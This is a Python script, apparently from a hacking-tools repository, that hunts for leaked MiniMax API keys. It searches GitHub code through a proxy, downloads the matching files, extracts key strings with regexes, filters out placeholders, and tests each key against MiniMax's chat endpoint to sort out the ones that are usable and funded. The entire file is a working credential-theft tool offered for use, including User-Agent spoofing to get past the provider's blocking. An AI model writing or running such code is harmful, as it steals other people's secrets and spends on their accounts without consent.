Files
hack/tools/scripts/llm-key-hunter/hunt_minimax_deep.py
T

311 lines
12 KiB
Python

#!/usr/bin/env python3
"""Deep hunter for MiniMax API keys (https://www.minimaxi.com).
Hunts both flavours that show up on GitHub:
* MiniMax Coding Plan -> sk-cp-... (~125 chars)
* Standard paygo -> sk-... + ~32+ alnum (api.minimaxi.com / api.minimax.io)
GitHub search via GH_PROXY (GFW blocked). Verification DIRECT against
https://api.minimaxi.com/v1. A real completion requires non-null `choices`
with message content — HTTP 200 with "choices":null is the Token Plan cap
(base_resp.status_code == 2056 "已达到 Token Plan 用量上限"), NOT usable.
Only 401 / invalid-key = DEAD. 402/429/2056/balance = NO_BALANCE (real plan,
exhausted). A browser-like User-Agent is sent because the edge 403s urllib's
default UA.
"""
import json, os, re, sys, time, urllib.parse, urllib.request, urllib.error
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from verify_cache import CachedVerifier
HERE = Path(__file__).resolve().parent
OUT = HERE / "results" / "minimax_deep"
OUT.mkdir(parents=True, exist_ok=True)
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
TOKEN = (os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
or os.popen("gh auth token 2>/dev/null").read().strip())
GH_OPENER = (urllib.request.build_opener(
urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}))
if GH_PROXY else urllib.request.build_opener())
DIRECT = urllib.request.build_opener()
UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/124.0 Safari/537.36")
BASE = "https://api.minimaxi.com/v1"
CHAT_PATH = "/text/chatcompletion_v2" # MiniMax native chat path
MODELS = ("MiniMax-M2.5", "MiniMax-M2.7", "MiniMax-M3", "abab6.5s-chat")
# Broad, MiniMax-specific code search queries.
QUERIES = [
'"sk-cp-" minimaxi',
'"sk-cp-" "MiniMax-M2"',
'"MINIMAX_API_KEY" sk-',
'"api.minimaxi.com" sk-',
'"api.minimax.io" sk-',
'"MINIMAX_CLI_KEY"',
'"MINIMAX_API_KEY" extension:env',
'"MINIMAX_API_KEY" extension:json',
'"minimax" "sk-cp-" extension:py',
'"minimax" "sk-cp-" extension:js',
'"minimax" "sk-cp-" extension:ts',
'"minimax" "sk-cp-" extension:yaml',
'"MINIMAX_GROUP_ID" sk-',
'"MiniMax-M2.5" api_key',
'"abab6.5s-chat" api_key',
'filename:.env minimax',
'"minimax" "Bearer sk-" extension:py',
]
# sk-cp- coding plan keys are ~125 chars; paygo keys sk-<~48-90>. Grab greedily.
KEY_PATTERNS = [
re.compile(r"sk-cp-[A-Za-z0-9_\-]{40,140}"),
re.compile(r"sk-[A-Za-z0-9]{48,90}\b"),
]
# File must mention minimax near the key (or the sk-cp- prefix is enough signal).
CONTEXT = ("minimaxi.com", "minimax.io", "minimax", "abab6.5", "minimaxi",
"MiniMax-M2", "MINIMAX")
FAKE = ("xxxx", "your-", "example", "1234567890", "replace", "changeme",
"placeholder", "sk-test", "your_api", "your-api", "<", "..." , "sk-cp-0000")
def gh_code_search(query, max_results=100):
out = []
for page in range(1, 4):
url = ("https://api.github.com/search/code?"
+ urllib.parse.urlencode({"q": query, "per_page": 100, "page": page}))
req = urllib.request.Request(url, headers={
"Authorization": "token " + TOKEN,
"Accept": "application/vnd.github+json",
"User-Agent": "minimax-hunter/1.0"})
try:
with GH_OPENER.open(req, timeout=30) as r:
data = json.loads(r.read())
except urllib.error.HTTPError as e:
if e.code in (403, 429):
reset = e.headers.get("X-RateLimit-Reset")
wait = min(max(int(reset) - int(time.time()) + 2, 2), 120) if reset else 30
time.sleep(wait); continue
if e.code == 422:
break
time.sleep(5); continue
except Exception:
time.sleep(5); continue
items = data.get("items", [])
for it in items:
out.append((it["repository"]["full_name"], it["path"], it["html_url"]))
if len(items) < 100:
break
time.sleep(6.5)
return out[:max_results]
def fetch_raw(repo, path):
for ref in ("HEAD", "main", "master"):
url = f"https://raw.githubusercontent.com/{repo}/{ref}/{path}"
req = urllib.request.Request(url, headers={"User-Agent": UA})
try:
with GH_OPENER.open(req, timeout=25) as r:
return r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
if e.code == 404:
continue
return ""
except Exception:
continue
return ""
def harvest(text):
if not text:
return set()
low = text.lower()
if not any(c.lower() in low for c in CONTEXT):
return set()
found = set()
for rx in KEY_PATTERNS:
for m in rx.finditer(text):
k = m.group(0).rstrip("'\"`,;)")
kl = k.lower()
if any(f in kl for f in FAKE):
continue
if not k.startswith("sk-cp-"):
lo = max(0, m.start() - 100); hi = min(len(low), m.end() + 100)
if "minimax" not in low[lo:hi] and "minimaxi" not in low[lo:hi] \
and "abab" not in low[lo:hi]:
continue
found.add(k)
return found
def classify_response(code, body):
"""Return (verdict, detail). Caller already knows HTTP code."""
# Try to parse JSON.
j = None
try:
j = json.loads(body)
except Exception:
pass
msg = ""
base_code = None
choices = None
if isinstance(j, dict):
err = j.get("error")
if isinstance(err, dict):
msg = str(err.get("message", ""))[:160]
elif isinstance(err, str):
msg = err[:160]
base = j.get("base_resp") or {}
base_code = base.get("status_code")
if base.get("status_msg"):
msg = (msg + " " + str(base["status_msg"])).strip()[:160]
choices = j.get("choices")
if choices:
return "USABLE", "200 choices"
if code == 401:
return "DEAD", f"401 {msg}".strip()
if code == 402:
return "NO_BALANCE", f"402 {msg}".strip()
if code == 429:
return "NO_BALANCE", f"429 {msg}".strip()
if code == 200:
# HTTP 200 but no choices -> inspect base_resp.status_code
if base_code == 2056:
return "NO_BALANCE", "2056 token plan capped"
# 2056 = token plan cap. Other balance/quota codes per MiniMax docs.
if base_code in (1002, 1008, 1013, 1026, 1038, 1045, 1063, 1064, 1082):
return "NO_BALANCE", f"{base_code} {msg}".strip()
# 1004 = "login fail" / invalid API secret; 2049 = invalid api key;
# 1001/1003/1014/1111 auth errors
if base_code in (1001, 1003, 1004, 1014, 1111, 2049):
return "DEAD", f"{base_code} invalid {msg}".strip()
if choices is None and base_code is None:
return "UNKNOWN", f"200 no choices/base_resp: {body[:120]}"
return "NO_ACCESS", f"200 base={base_code} {msg}".strip()
if code == 400:
ml = msg.lower()
if any(w in ml for w in ("invalid", "unauthor", "api key", "authentication",
"incorrect", "invalid api key")):
return "DEAD", f"400 {msg}".strip()
if any(w in ml for w in ("balance", "quota", "insufficient", "limit",
"payment", " arrears", "2056")):
return "NO_BALANCE", f"400 {msg}".strip()
return "NO_ACCESS", f"400 {msg}".strip()
if code in (403, 404, 422, 451, 500, 502, 503, 520, 524, 0):
return ("NO_ACCESS" if code in (403, 404, 422, 451) else "UNKNOWN"), \
f"{code} {msg}".strip() or f"{code}"
return "UNKNOWN", f"{code} {msg}".strip()
def verify(key):
last = "no model tried"
for model in MODELS:
body = json.dumps({
"model": model,
"messages": [{"role": "user", "content": "reply with the word ok"}],
"max_tokens": 16, "temperature": 0.01,
}).encode()
req = urllib.request.Request(
BASE + CHAT_PATH, data=body,
headers={"Authorization": "Bearer " + key,
"Content-Type": "application/json",
"User-Agent": UA, "Accept": "application/json"})
try:
with DIRECT.open(req, timeout=45) as r:
code = r.getcode(); data = r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
code = e.code
try:
data = e.read().decode("utf-8", "replace")
except Exception:
data = ""
except Exception as e:
last = f"net {type(e).__name__}"
continue
verdict, detail = classify_response(code, data)
# USABLE / DEAD / NO_BALANCE are final; NO_ACCESS/UNKNOWN try next model
if verdict in ("USABLE", "DEAD", "NO_BALANCE"):
return verdict, f"{model} {detail}"
last = f"{model} {detail}"
return "UNKNOWN", last
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("--search", action="store_true")
ap.add_argument("--verify", action="store_true")
ap.add_argument("--workers", type=int, default=20)
args = ap.parse_args()
cand = OUT / "candidates.tsv"
if args.search:
seen = set()
if cand.exists():
for ln in cand.read_text().splitlines():
p = ln.split("\t")
if len(p) >= 3:
seen.add(p[2])
print(f"proxy={GH_PROXY} token={'yes' if TOKEN else 'NO'}")
for q in QUERIES:
res = gh_code_search(q)
new = [r for r in res if r[2] not in seen]
for repo, path, url in new:
seen.add(url)
with cand.open("a") as f:
f.write(f"{repo}\t{path}\t{url}\n")
print(f" {q:38} {len(res):3} hits, {len(new):3} new", flush=True)
time.sleep(2)
print(f"candidate files -> {cand}")
if args.verify:
if not cand.exists():
print("no candidates.tsv (run --search first)"); return
files = [ln.rstrip("\n").split("\t") for ln in cand.read_text().splitlines()
if ln.strip()]
print(f"harvesting {len(files)} files...")
keys = {}
for i, (repo, path, url) in enumerate(files):
for k in harvest(fetch_raw(repo, path)):
keys.setdefault(k, url)
if (i + 1) % 25 == 0:
print(f" {i+1}/{len(files)} keys={len(keys)}", flush=True)
time.sleep(0.1)
print(f"harvested {len(keys)} unique candidate keys")
buckets = {k: [] for k in
("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD")}
with CachedVerifier("minimax_deep", verify) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as ex:
futs = {ex.submit(ver, k): (k, s) for k, s in keys.items()}
done = 0
for fut in as_completed(futs):
k, s = futs[fut]; done += 1
try:
v, d = fut.result()
except Exception as e:
v, d = "UNKNOWN", f"exc:{e}"
buckets[v].append((k, s, d))
if done % 25 == 0:
print(f" {done}/{len(keys)} usable={len(buckets['USABLE'])} "
f"nobal={len(buckets['NO_BALANCE'])} "
f"dead={len(buckets['DEAD'])}", flush=True)
for label in buckets:
with (OUT / f"{label.lower()}.txt").open("w") as f:
for k, s, d in buckets[label]:
f.write(f"{k}\t{s}\t{d}\n")
print()
for label in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD"):
print(f" {label:11}: {len(buckets[label])}")
for k, s, d in buckets["USABLE"]:
print(f" ✅ {k[:60]} {d}")
print(f" {s}")
if __name__ == "__main__":
main()